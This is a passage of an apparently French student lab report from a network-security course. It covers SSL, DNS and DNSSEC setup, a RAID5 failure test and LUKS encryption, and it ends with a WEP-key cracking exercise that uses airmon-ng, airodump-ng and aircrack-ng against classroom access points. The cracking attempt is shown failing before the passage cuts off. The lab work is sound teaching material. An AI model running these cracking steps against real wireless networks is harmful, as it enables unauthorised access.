    -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# apt-get install postfix mailx&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# cp certificat.crt /etc/ssl/certs/banane.space.crt&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# cp serveur.key /etc/ssl/private/banane.space.key&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-banane.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2/sites-available# cat 000-banane.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.banane.space&lt;br /&gt;
         ServerAlias banane.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/banane.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/banane.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2# cat ports.conf &lt;br /&gt;
    Listen 80&lt;br /&gt;
    &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
    Listen 443&lt;br /&gt;
    &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
    &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
    Listen 443&lt;br /&gt;
    &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2# service apache2 stop&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2# service apache2 start&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2# service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre site est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
 zone &amp;quot;banane.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.banane.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
On créée ensuite le fichier db.banane.space:&lt;br /&gt;
&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.banane.space. root.banane.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns.banane.space. &lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns      IN      A       193.48.57.179&lt;br /&gt;
 www     IN      A       193.48.57.179&lt;br /&gt;
 @       IN      A       193.48.57.179&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
    search banane.space&lt;br /&gt;
    nameserver 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''DNS SEC''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Génération des clefs asymétriques: &lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE: dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE banane.space&lt;br /&gt;
    root@IMA5-BANANE: dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE banane.space&lt;br /&gt;
&lt;br /&gt;
On modifie le nom des clefs: &lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind/banane.space.dnssec# ls&lt;br /&gt;
&lt;br /&gt;
    banane.space-ksk.key	  banane.space-zsk.key	    dsset-banane.space.&lt;br /&gt;
    banane.space-ksk.private  banane.space-zsk.private&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous signons ensuite les zones:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE: dnssec-signzone -o banane.space -k banane.space-ksk ../db.banane.space banane.space-zsk&lt;br /&gt;
&lt;br /&gt;
Pour finir nous ajoutons la clef KSK sur Gandi avec l'algorithme RSA/SHA1. On vérifie que le DNSSEC est bien mis en place.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:DNSSEC.png]]&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Nous créons trois nouvelles partitions qui vont représenter nos disques.&lt;br /&gt;
&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons ces partitions dans la machine virtuelle via le fichier IMA5-BANANE.conf&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On installe mdadm dans notre MV&lt;br /&gt;
&lt;br /&gt;
    apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé l paquetage mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
    mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous créons le volume /dev/md0 pour créer un RAID5 logiciel avec les trois partitions obtenues. On sauvegarde ensuite la configuration actelle.&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
    root@IMA5-BANANE:~# mkfs /dev/md0&lt;br /&gt;
    root@IMA5-BANANE:~# mkdir /datamd0&lt;br /&gt;
    root@IMA5-BANANE:/datamd0# mount /dev/md0 /datamd0/&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être sûr que la partition soit encore montée après le reboot:&lt;br /&gt;
&lt;br /&gt;
    /dev/md0 /datamd0&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/datamd0# vim raid5test.txt&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
  /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous arrêtons la MV, mettons en commentaire la 1ère partition dans le fichier de configuration, puis redémarrons la machine. On constaste que la premiere partition a été &amp;quot;removed&amp;quot;:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
  /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# ls /datamd0/&lt;br /&gt;
    raid5test.txt&lt;br /&gt;
&lt;br /&gt;
Pour remettre la partition dans le raid5 il faut taper la commande suivante&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --add /dev/md0 /dev/xvdd&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours: Suppression de la partition xvdd:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --set-faulty /dev/md0 /dev/xvdd&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --remove /dev/md0 /dev/xvdd&lt;br /&gt;
 La partition est bien supprimée:&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&lt;br /&gt;
On remet à présent la partition supprimée:&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --add /dev/md0 /dev/xvdd&lt;br /&gt;
&lt;br /&gt;
On essaie ensuite de remonter le RAID5 et on peut constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Nous n'avons qu'une carte SD pour tous les binômes. On crée donc un disque logiciel localement sur /dev/mmcblk1 nous-mêmes pour &lt;br /&gt;
effectuer son cryptage en AES avec un hachage SHA256 et on renseigne un mot de passe de cryptage.&lt;br /&gt;
&lt;br /&gt;
    cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
&lt;br /&gt;
Nous ouvrons la partition Luks, puis nous formatons le disque :&lt;br /&gt;
&lt;br /&gt;
    cryptsetup luksOpen /dev/sdb1 banane-crypt&lt;br /&gt;
    mkfs.ext4 /dev/mapper/banane-crypt&lt;br /&gt;
&lt;br /&gt;
On monte le disque et on crée un fichier avec du texte dessus.&lt;br /&gt;
&lt;br /&gt;
    mount /dev/mapper/banane-crypt /mnt&lt;br /&gt;
    vi /mnt/test.txt&lt;br /&gt;
&lt;br /&gt;
On démonte ensuite le disque et on ferme la partition Luks.&lt;br /&gt;
&lt;br /&gt;
    umount /mnt&lt;br /&gt;
    cryptsetup luksClose banane-crypt&lt;br /&gt;
&lt;br /&gt;
Pour vérifier le cryptage de notre disque, on tente d'accéder de nouveau au disque et on s'aperçoit qu'on nous demande le mot de passe.&lt;br /&gt;
&lt;br /&gt;
    cryptsetup luksOpen /dev/sdb1 banane-crypt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Crackage de clef WEP sur Point d'accès Wi-Fi&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@zabeth17:/home/pifou# nping --arp-type ARP -c 11000  --flags rst --ttl 2 10.2.0.2&lt;br /&gt;
&lt;br /&gt;
Starting Nping 0.7.60 ( https://nmap.org/nping ) at 2017-12-12 15:13 GMT&lt;br /&gt;
SENT (0.0373s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
RCVD (0.2238s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
SENT (1.0378s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
RCVD (1.2438s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
SENT (2.0387s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
RCVD (2.0638s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
SENT (3.0399s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
RCVD (3.0839s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
SENT (4.0419s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
RCVD (4.1078s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
SENT (5.0439s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
&lt;br /&gt;
root@zabeth17:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
# This file describes the network interfaces available on your system&lt;br /&gt;
# and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
auto wlx000fb5922374&lt;br /&gt;
iface wlx000fb5922374 inet static&lt;br /&gt;
 wireless-keymode open&lt;br /&gt;
 wireless-mode managed&lt;br /&gt;
 address 10.2.0.100&lt;br /&gt;
 netmask 255.255.0.0&lt;br /&gt;
 wireless-essid banane&lt;br /&gt;
 wireless-key 01234567891011121314151617&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
airmon-ng start wlx000fb5922374&lt;br /&gt;
root@zabeth17:/home/pifou# iwconfig&lt;br /&gt;
docker0   no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vmnet1    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vmnet8    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vethea48f02  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vethc680cf4  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
enp6s0    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
veth27a815a  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
veth3773236  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vethf9b8093  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
enp0s25   no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.447 GHz  Tx-Power=15 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          &lt;br /&gt;
bridge    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vethb5bee00  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
veth12b76b4  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@zabeth17:/home/pifou# airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
 CH  8 ][ Elapsed: 6 s ][ 2017-12-12 15:04                                         &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                        &lt;br /&gt;
 C4:14:3C:12:61:C2  -67       26        0    0   9  54e. WEP  WEP         BORNE_TEST3                   &lt;br /&gt;
 C4:14:3C:12:61:C1  -61       28        0    0   9  54e. WEP  WEP         BORNE_TEST2                   &lt;br /&gt;
 C4:14:3C:40:78:60  -70       21        0    0   3  54e. WEP  WEP         ananas                        &lt;br /&gt;
 C4:14:3C:40:78:63  -76       20        0    0   3  54e. WEP  WEP         goyave                         &lt;br /&gt;
 C4:14:3C:12:61:C4  -68       25        0    0   9  54e. WEP  WEP         BORNE_TEST5                   &lt;br /&gt;
 C4:14:3C:12:61:C0  -68       27        0    0   9  54e. WEP  WEP         BORNE_TEST1                   &lt;br /&gt;
 C4:14:3C:12:61:C3  -63       25        0    0   9  54e. WEP  WEP         BORNE_TEST4                   &lt;br /&gt;
 C4:14:3C:40:78:61  -73       16        0    0   3  54e. WEP  WEP         banane                        &lt;br /&gt;
 C4:14:3C:40:78:64  -68       14        0    0   3  54e. WEP  WEP         groseille                     &lt;br /&gt;
 C4:14:3C:40:78:65  -74       22        0    0   3  54e. WEP  WEP         reseau1                       &lt;br /&gt;
 C4:14:3C:12:61:C5  -59       24        0    0   9  54e. WEP  WEP         BORNE_TEST6                    &lt;br /&gt;
 C4:14:3C:40:78:62  -72       16        0    0   3  54e. WEP  WEP         durian                        &lt;br /&gt;
 C4:14:3C:40:78:67  -77       16        0    0   3  54e. WEP  WEP         tomate                        &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                               &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 (not associated)   AC:AF:B9:B0:DF:32  -75    0 - 1      0        1  PolytechLille                       &lt;br /&gt;
 (not associated)   B8:08:D7:16:6E:69  -73    0 - 1      0        1                                      &lt;br /&gt;
 (not associated)   60:F4:45:D0:DA:DB  -73    0 - 1      0        2  PolytechLille  &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
pifou@zabeth15:~$ su&lt;br /&gt;
Password: &lt;br /&gt;
root@zabeth15:/home/pifou# iwconfig&lt;br /&gt;
vethbecbb63  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
enp0s25   no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
enp6s0    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
docker0   no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vmnet1    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
bridge    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vmnet8    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wlx000fb5922266  IEEE 802.11  ESSID:off/any  &lt;br /&gt;
          Mode:Managed  Access Point: Not-Associated   Tx-Power=0 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:off&lt;br /&gt;
          Power Management:off&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@zabeth15:/home/pifou# airmon-ng start wlx000fb5922266&lt;br /&gt;
&lt;br /&gt;
Found 3 processes that could cause trouble.&lt;br /&gt;
If airodump-ng, aireplay-ng or airtun-ng stops working after&lt;br /&gt;
a short period of time, you may want to run 'airmon-ng check kill'&lt;br /&gt;
&lt;br /&gt;
  PID Name&lt;br /&gt;
 1695 dhclient&lt;br /&gt;
 2949 avahi-daemon&lt;br /&gt;
 2950 avahi-daemon&lt;br /&gt;
&lt;br /&gt;
PHY	Interface	Driver		Chipset&lt;br /&gt;
&lt;br /&gt;
phy0	wlx000fb5922266	p54usb		NetGear, Inc. WG111(v1) rev 2 54 Mbps Wireless [Intersil ISL3887]&lt;br /&gt;
Interface 15mon is too long for linux so it will be renamed to the old style (wlan#) name.&lt;br /&gt;
&lt;br /&gt;
		(mac80211 monitor mode vif enabled on [phy0]wlan0mon&lt;br /&gt;
		(mac80211 station mode vif disabled for [phy0]wlx000fb5922266)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@zabeth15:/home/pifou# airodump-ng --bssid C4:14:3C:40:78:61 -c 3 -w crack_wep_ungdelatte wlan0mon&lt;br /&gt;
&lt;br /&gt;
# -c 3 précise que le réseau est sur le channel 3.&lt;br /&gt;
# -w crack_wep_ungdelatte est le fichier qui va stocker les paquets capturés.&lt;br /&gt;
&lt;br /&gt;
 CH  3 ][ Elapsed: 20 mins ][ 2017-12-12 15:18                     &lt;br /&gt;
                                                                   &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  C&lt;br /&gt;
                                                                   &lt;br /&gt;
 C4:14:3C:40:78:61  -64   8    11488        0    0   3  54e. WEP  W&lt;br /&gt;
                                                                   &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@zabeth15:/home/pifou# aircrack-ng crack_wep_ungdelatte-01.cap&lt;br /&gt;
Opening crack_wep_ungdelatte-01.cap&lt;br /&gt;
Read 12494 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
&lt;br /&gt;
   1  C4:14:3C:40:78:61  banane                    No data - WEP or WPA&lt;br /&gt;
&lt;br /&gt;
Choosing first network as target.&lt;br /&gt;
&lt;br /&gt;
Opening crack_wep_ungdelatte-01.cap&lt;br /&gt;
Got no data packets from target network!&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@zabeth15:/home/pifou# airodump-ng --bssid C4:14:3C:40:78:61 -c 3 -w crack_wep_ungdelatte wlan0mon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 CH  3 ][ Elapsed: 28 mins ][ 2017-12-12 16:03                     &lt;br /&gt;
                                                                   &lt;br /&gt;
